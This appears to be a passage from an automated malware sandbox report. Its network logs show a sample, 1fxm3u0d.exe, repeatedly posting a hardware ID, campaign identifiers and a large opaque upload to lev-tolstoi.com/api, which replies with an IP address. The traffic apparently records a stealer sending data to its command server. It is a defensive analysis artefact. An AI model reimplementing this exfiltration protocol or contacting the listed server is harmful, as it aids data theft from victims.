                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2024-12-18 10:33:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.549718104.21.66.864436596C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 10:33:16 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=GQQ2DS1FJFJFFVVVVVVVVVVVVVV
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 15132
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 10:33:16 UTC15132OUTData Raw: 2d 2d 47 51 51 32 44 53 31 46 4a 46 4a 46 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 47 51 51 32 44 53 31 46 4a 46 4a 46 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 51 51 32 44 53 31 46 4a 46 4a 46 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
                                                                                                                                                                                                                                      Data Ascii: --GQQ2DS1FJFJFFVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--GQQ2DS1FJFJFFVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"2--GQQ2DS1FJFJFFVVVVVVVVVVVVVVContent-Disposition: form-data;
                                                                                                                                                                                                                                      2024-12-18 10:33:18 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 10:33:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=qtlrn7llhhmlu1b2re8en2dnm2; expires=Sun, 13-Apr-2025 04:19:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZTrEbdSBg63Wv2iM6%2BTKoZFb8dHz6qZjyEfcb3reSzWT244q5rVR48zr0zR8Z72l4syPLldhwpjTSAMunfoOI6u%2FNulfFdty6VxqcddrEk1uukx%2FB9Dh%2B41WEheWJxW%2F0M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3e7e697dff0fa5-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1467&rtt_var=556&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=16080&delivery_rate=1955793&cwnd=190&unsent_bytes=0&cid=5ef86fe2b6d8a241&ts=1251&x=0"
                                                                                                                                                                                                                                      2024-12-18 10:33:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2024-12-18 10:33:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.549724104.21.66.864436596C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 10:33:19 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=ESPXYNHJ3ZZNBVVVVVVVVVVVVV
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 20616
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 10:33:19 UTC15331OUTData Raw: 2d 2d 45 53 50 58 59 4e 48 4a 33 5a 5a 4e 42 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 45 53 50 58 59 4e 48 4a 33 5a 5a 4e 42 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 53 50 58 59 4e 48 4a 33 5a 5a 4e 42 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d
                                                                                                                                                                                                                                      Data Ascii: --ESPXYNHJ3ZZNBVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--ESPXYNHJ3ZZNBVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"3--ESPXYNHJ3ZZNBVVVVVVVVVVVVVContent-Disposition: form-data; nam
                                                                                                                                                                                                                                      2024-12-18 10:33:19 UTC5285OUTData Raw: cd e4 cf 67 a2 84 e9 ea 99 52 b9 38 d6 94 8e 12 66 2b 13 61 42 a1 99 d0 17 25 34 f2 93 f5 b1 05 a9 66 42 b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: gR8f+aB%4fBZ>56vMMZh'F3Wun 4F([:7s~
                                                                                                                                                                                                                                      2024-12-18 10:33:20 UTC1040INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 10:33:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=o99uq0le9jft0uo1hpj8munado; expires=Sun, 13-Apr-2025 04:19:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hzdIl4Cb7qqXmYInY5PNWzomvFgT%2FYWcOUCU46tusmI0JIosMoOQ7gSv%2FWjXMi8cvRD35Xnez6BeLrNLtX8H27OHESbX3hKH%2FhUmNV%2Bw3anWadfJDbkFvqtUeGuvbimHhRE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3e7e79fd931921-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1497&rtt_var=577&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21585&delivery_rate=1871794&cwnd=139&unsent_bytes=0&cid=bc45bed07831b5f4&ts=883&x=0"
                                                                                                                                                                                                                                      2024-12-18 10:33:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2024-12-18 10:33:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.549731104.21.66.864436596C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 10:33:21 UTC291OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=IFJI9R3F3ZFVVVVVVVVVVVVVVVVVV
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 1333
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 10:33:21 UTC1333OUTData Raw: 2d 2d 49 46 4a 49 39 52 33 46 33 5a 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 49 46 4a 49 39 52 33 46 33 5a 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 46 4a 49 39 52 33 46 33 5a 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d
                                                                                                                                                                                                                                      Data Ascii: --IFJI9R3F3ZFVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--IFJI9R3F3ZFVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"1--IFJI9R3F3ZFVVVVVVVVVVVVVVVVVVContent-Disposition: form-
                                                                                                                                                                                                                                      2024-12-18 10:33:22 UTC1041INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 10:33:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=f2721k6b8fah5qhsjoifq94jt1; expires=Sun, 13-Apr-2025 04:20:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2B9j1%2BRijXh9NQboZk0Px9HIwnQUSnYu98VnGuHWeJOHn%2FKlyk2ekFM3ak9V%2BKrqXs34AfK88a0RghC8a6bFVb8RJbnxNW4wn2EsCp%2Fdt5orv3lJjei5AMxgip%2BpqS9OsWE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3e7e898b618ce9-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=1872&rtt_var=812&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2260&delivery_rate=1559829&cwnd=231&unsent_bytes=0&cid=ba6c426bf311e132&ts=757&x=0"
                                                                                                                                                                                                                                      2024-12-18 10:33:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2024-12-18 10:33:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.549738104.21.66.864436596C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=SSHF8DNVNZFFVVVV
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 569058
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: 2d 2d 53 53 48 46 38 44 4e 56 4e 5a 46 46 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 53 53 48 46 38 44 4e 56 4e 5a 46 46 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 53 48 46 38 44 4e 56 4e 5a 46 46 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 55 6e 69 71 75 65 0d 0a 2d 2d 53
                                                                                                                                                                                                                                      Data Ascii: --SSHF8DNVNZFFVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--SSHF8DNVNZFFVVVVContent-Disposition: form-data; name="pid"1--SSHF8DNVNZFFVVVVContent-Disposition: form-data; name="lid"FATE99--Unique--S
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: c3 17 24 66 5f af f5 ef 77 c0 00 95 f9 da de 82 a5 7a 05 c6 48 39 4b 69 70 24 2c a5 1c 40 00 b1 13 c4 d8 43 29 12 40 69 02 ca 6a 84 33 4f b8 32 5c 85 41 bb 2a 16 e6 e3 60 d9 b6 e8 f0 4c b1 f5 7d 1c 8f 1d e0 b1 ef bc 2d 1a 84 57 74 74 77 63 fb 4c f9 ad fe ff 07 d1 a9 07 00 ad b8 03 cc f1 81 04 53 4a 3e 0b 30 fb f8 60 7e aa d2 a5 cc 88 c8 32 cb c5 de cc 72 7e 88 fb 0f d1 f8 b1 39 83 4b 34 b2 ef b4 81 18 87 64 10 6f e1 90 9a e9 e4 c1 07 9a 15 57 03 4d d1 71 3b 9e 39 95 41 0a 6a 30 65 07 af 44 93 ea bf f5 21 3d 22 f1 13 82 5b bb 65 68 ce 1c 28 76 a4 26 f9 f9 f2 a4 1a 77 4a 2b 89 52 6d 21 4f 1e 82 e5 7a 4b 80 8d 1b 77 ba a4 14 53 74 0e 33 6f 92 b1 dd 1c e0 aa c8 6a 70 16 e5 10 d6 14 6b 7b cd 4d c7 d7 1d 95 28 24 46 16 92 e8 ac 6a ce e4 ae 00 ff 3d 54 6d 74 90
                                                                                                                                                                                                                                      Data Ascii: $f_wzH9Kip$,@C)@ij3O2\A*`L}-WttwcLSJ>0`~2r~9K4doWMq;9Aj0eD!="[eh(v&wJ+Rm!OzKwSt3ojpk{M($Fj=Tmt
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: d6 8b da 4d 80 b1 3a ff 25 34 b9 77 0a 14 13 52 ee 32 c9 a2 36 13 db 31 3d 2e 8d e1 01 a7 32 22 1e 88 ea 0d d7 ba 46 f2 94 30 b0 da 26 75 da 52 4d c4 51 95 ff 6d 52 8d d5 17 cb 67 21 b4 6d 68 5e 6c 6a cd cd 17 9a fe 7d 24 50 1d 09 aa 8c 1a 5d 3f e2 32 e8 6a 6c 26 92 9b ca 08 bf 34 4f 5e 72 b1 80 83 4e 93 f1 3e 89 8b d6 2a d5 89 3b 19 a1 44 d3 67 16 71 47 d0 04 14 3b ad 78 e5 ab c2 7a 9d a4 bb 0a c3 70 52 a9 31 78 1a d5 58 5e 81 78 de e4 7c 13 2f 81 3d 6a c5 89 35 fa 3b 08 2c da 67 33 82 17 5f 7e 39 56 fa db bd b0 ce f2 ec 15 1e 2d f3 cf 9c 6c 86 06 1f 46 92 73 26 81 b7 27 ad bd 5d 11 a1 73 7e 0b fd fd 61 33 73 67 63 b3 e6 df 6b 21 e1 dd b4 5c f7 72 32 8a d0 f6 b4 f6 fb 66 ab 2c f2 3f 75 de 22 58 84 7e db 68 fe 53 14 55 ff c7 c5 8e 0e 95 c6 d0 bd ac b1 8c
                                                                                                                                                                                                                                      Data Ascii: M:%4wR261=.2"F0&uRMQmRg!mh^lj}$P]?2jl&4O^rN>*;DgqG;xzpR1xX^x|/=j5;,g3_~9V-lFs&']s~a3sgck!\r2f,?u"X~hSU
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: 57 a4 40 7b 44 1a 4c dc 35 0d cf 4e 4d 79 89 9d 19 1c 2f 1d d4 97 8f 09 77 b4 39 54 a1 77 0d 53 0e b4 6b da 0f 47 4a ac 3b 4d 79 31 b4 60 85 ea 4d c6 28 8a e7 26 7a 84 2c 09 96 9d d4 51 0d ba 5e 40 e8 82 88 5b 74 dd d2 53 95 d4 ef 6e 43 2c 9b a9 fc c5 94 bf f5 19 52 6d ba 6f e4 c1 e0 a5 91 42 f2 f9 65 c1 62 43 c6 f0 b7 b2 83 84 da f6 3b df 87 91 0e f9 2b a0 3e ec aa c7 af 21 85 4f c3 99 d5 40 3b 5c 3d 7b 17 9a d6 6a 5d 32 cf d9 74 fa 28 49 03 38 b6 ab a4 c4 63 d2 e3 51 b9 a3 f8 c6 6f 75 35 ef 1d 39 4e 8f 3a 8f 35 95 3e 10 2a 0c 19 f1 cd 94 b8 12 4b b5 a5 c3 6f 5d 1a 2f 57 20 fb 1c 35 1d d5 49 75 ef f8 46 a1 5d 15 f6 48 fe 32 ef d5 d1 b2 c9 f8 41 72 b3 8d 1a e5 54 3b bd c1 a4 1f 12 f1 a1 68 b1 8d 87 36 16 04 18 a3 ef 19 3c 6b be 81 ce 5b a5 a1 15 e7 96 52
                                                                                                                                                                                                                                      Data Ascii: W@{DL5NMy/w9TwSkGJ;My1`M(&z,Q^@[tSnC,RmoBebC;+>!O@;\={j]2t(I8cQou59N:5>*Ko]/W 5IuF]H2ArT;h6<k[R
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: 89 d2 4f 40 6b a9 d4 dd 60 2b 45 61 d3 a3 64 50 93 61 bf e2 e5 c9 7c db 77 86 49 c6 e3 ed 38 d1 a9 78 d5 a8 1d 7d e2 83 da eb ed 32 44 7b ae c9 51 0a fb b8 ad 27 b5 af 25 70 92 e6 f3 e5 18 de 77 65 57 97 0a 08 3a a2 9c d6 f1 a4 c1 ac 1c e5 a3 8c 86 b0 0a e4 41 58 e1 0a 80 96 b0 87 58 a2 e0 07 6f db 0f e1 16 62 b0 1b 76 5d 9a 83 ac b1 10 41 8f 44 06 41 d7 dd 55 1a f9 20 0b 60 af 42 39 f4 fb 6d 29 cb 71 ca c3 b3 8a 0f 66 51 ca 2e c3 ec 3c 68 65 af 10 73 97 27 30 c5 5e 1b c1 32 e7 fa ef ee de eb d9 99 2b 5e 79 75 37 26 dd ad 8e 39 9e 23 3a e5 9c 10 2f 16 ec 80 97 91 ed fb 96 04 1f df 8c dd d1 2c b9 e8 a4 47 90 c0 5c 88 75 ec 5b 65 04 fa eb 74 cd db 54 58 39 64 77 82 66 c5 d1 ef 3f 84 13 74 20 5d 53 97 7f 81 f6 06 6a e3 4e cf f8 b7 26 5b 41 14 38 27 61 79 4f
                                                                                                                                                                                                                                      Data Ascii: O@k`+EadPa|wI8x}2D{Q'%pweW:AXXobv]ADAU `B9m)qfQ.<hes'0^2+^yu7&9#:/,G\u[etTX9dwf?t ]SjN&[A8'ayO
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: 4c f8 ec be d5 32 3a 82 70 85 92 58 04 02 70 f9 21 00 fa 37 c2 dd c3 ae a3 fc 7b 27 98 cd 13 95 65 4f 13 50 e8 d7 1b 4f 11 9f c1 01 9e 11 a0 c9 60 96 c1 ec a1 b9 c7 0e 91 61 36 10 ed 79 79 02 4b f4 27 dc 04 8b 11 8f f6 1e 05 2c 77 9b d0 11 41 10 a8 b7 7e 5f c6 53 be 58 87 00 09 c0 bb 60 0b 84 f5 62 88 b9 23 c5 d2 c2 ad f4 9c 07 e1 4f d7 fd c2 06 05 7d 0f 2f db ce 57 f6 ec 72 93 f8 9b f5 c4 eb ec 58 2b ba d5 0c 7f ff bd 65 1f f0 8e e2 9f c8 51 2b 74 12 01 6e 4a 76 83 60 83 1c 15 20 27 ce 3e ab c8 f8 22 fe 05 f2 8e d2 28 28 93 82 a6 3b 97 64 63 19 3d 25 38 d9 dc 33 88 e1 31 51 6a df fe ee 9d 60 72 44 09 c7 38 2d 21 f1 a7 34 f9 9d 28 f5 04 91 b8 fc 53 aa 5b 04 08 4b 47 df fa 0a c9 5d 2f 70 23 a0 0d fe ce a8 a3 a8 9d 58 d4 48 04 1c 0c 5f 0a 9c 3e 92 c1 f7 24
                                                                                                                                                                                                                                      Data Ascii: L2:pXp!7{'eOPO`a6yyK',wA~_SX`b#O}/WrX+eQ+tnJv` '>"((;dc=%831Qj`rD8-!4(S[KG]/p#XH_>$
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: 0b f6 67 f1 d2 95 e7 82 0c 36 e7 7d 4e f9 35 aa 88 80 f0 7e e6 da 4b 42 74 cf d9 44 29 d7 b9 b7 4e fb da c3 8b 77 5a d3 57 6f b6 1d c2 5c 76 44 ba b8 cb 89 98 17 2b af 4b f0 71 8c da 5b 78 db 54 b3 ce e7 67 1b 5f ac 2c 5d 2b ae ba ef a2 13 59 75 75 5f d5 6a b7 e3 f7 dd 24 16 cd 69 1c 16 bc 0f d5 3c 09 78 ad f3 fc ad 0f ab 87 ca 74 94 2a b5 fb d2 42 f9 71 77 8b 2c 45 f5 3f a4 cf 83 fe fd ee 96 cc b0 9f af ac 23 57 9d 9e 77 0e e7 48 44 ae be b8 ed 25 08 13 5a 77 66 4e 9e fe e2 60 da ff bd 74 34 d5 5e f2 93 d9 f7 83 19 d9 c3 71 cc d9 2b 91 a6 8c 18 d9 8d af 42 2d c7 17 a2 1b 8a d6 1a de ae 37 ac df 9b 38 e1 f4 4e 38 e4 a9 0d cc b7 dc 1d 83 8a 52 d5 90 ac 66 e2 36 ae c6 15 e2 25 9e 81 94 50 47 68 61 4f c1 b5 8d 53 7e a3 4f aa 72 7c 83 fd 1c 14 62 ad 8e 54 6f
                                                                                                                                                                                                                                      Data Ascii: g6}N5~KBtD)NwZWo\vD+Kq[xTg_,]+Yuu_j$i<xt*Bqw,E?#WwHD%ZwfN`t4^q+B-78N8Rf6%PGhaOS~Or|bTo
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: 03 3a f5 c6 5d 00 76 f5 12 ae a0 11 41 1e 96 5b 68 ae 09 a3 2b bc d4 70 74 8d a9 3a e8 e8 d9 a8 2e f8 ec b3 3c e1 08 47 0c 7d 3e 5b a4 f1 0e 1c 2b 6b b2 36 5a dd a1 2a 4f c6 76 f0 43 4e 1c 68 6a 2c dd c5 19 58 b5 59 4e 17 06 12 43 b0 df 0e 4a 7b 71 7e 61 d3 13 70 c9 db b0 b5 01 a6 e6 51 5c 11 dd a6 80 26 cb 4a 10 c4 96 a7 f5 05 f3 9d 9b ca 8d c5 d7 22 e6 e7 78 cc 19 11 c9 5b 38 60 26 66 96 d9 5d 43 15 7f 54 77 6e ce c3 b3 01 6b 8a 1b 57 84 f2 34 d0 e3 31 29 7c b3 15 47 14 e5 2f b8 44 6c 9c 53 26 0a fc 18 38 8d 6d ab b7 f6 82 1d b9 7b 23 c9 da 26 5f 7e 5c 51 d0 58 7c ee 09 25 df 22 4c 02 0c 5a 69 7d 70 0c 54 e3 6b 0f c3 58 0d 3b 28 90 83 99 03 fd 65 b1 c6 29 dc 73 cc 8c ab ec bb a6 84 14 4c 50 0c 9d 09 08 ef c9 5e f8 74 53 b5 8e 50 78 79 04 17 e2 b3 fa 95
                                                                                                                                                                                                                                      Data Ascii: :]vA[h+pt:.<G}>[+k6Z*OvCNhj,XYNCJ{q~apQ\&J"x[8`&f]CTwnkW41)|G/DlS&8m{#&_~\QX|%"LZi}pTkX;(e)sLP^tSPxy
